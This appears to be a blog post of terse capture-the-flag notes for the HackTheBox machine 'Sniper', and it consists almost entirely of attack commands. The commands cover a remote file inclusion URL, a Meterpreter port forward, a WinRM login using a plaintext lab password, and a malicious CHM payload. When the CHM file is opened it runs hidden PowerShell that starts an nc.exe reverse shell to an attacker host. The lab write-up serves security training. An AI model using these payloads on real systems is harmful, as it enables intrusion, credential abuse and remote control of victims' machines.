Post

Sniper @ HackTheBox

Sniper is a 30-point machine on HackTheBox that involves abusing a remote file inclusion and uploading a crafted chm file which is opened automatically by the local administrator.

Notes

Remote File Inclusion:

1
http://10.10.10.151/blog/?lang=//<ip>/share/xct.php

Meterpreter port forward:

1
portfwd add -l 8000 -p 5985 -r 10.10.10.151 

WinRM:

1
2
3
4
5
6
7
set winrm/config/client @{TrustedHosts="*"}
Enable-WSManCredSSP -Role "Client" -DelegateComputer "*"
$user = 'Chris'
$pass = ConvertTo-SecureString -AsPlainText '36mEAhz/B8xQ~2VM' -Force
$cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user,$pass
New-PSSession -URI http://localhost:8000/wsman -Credential $cred
Enter-PSSession -id <id>

Generate CHM-Payload:

1
Out-CHM -Payload "c:\programdata\nc.exe -e cmd.exe <ip> <port>" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"

Payload:

1
2
3
4
5
6
7
8
9
10
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1" value=",cmd.exe,/c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile c:\programdata\nc.exe -e cmd.exe <ip> <port>">
 <PARAM name="Item2" value="273,1,1">
</OBJECT>

<SCRIPT>
x.Click();
</SCRIPT>
This post is licensed under CC BY 4.0 by the author.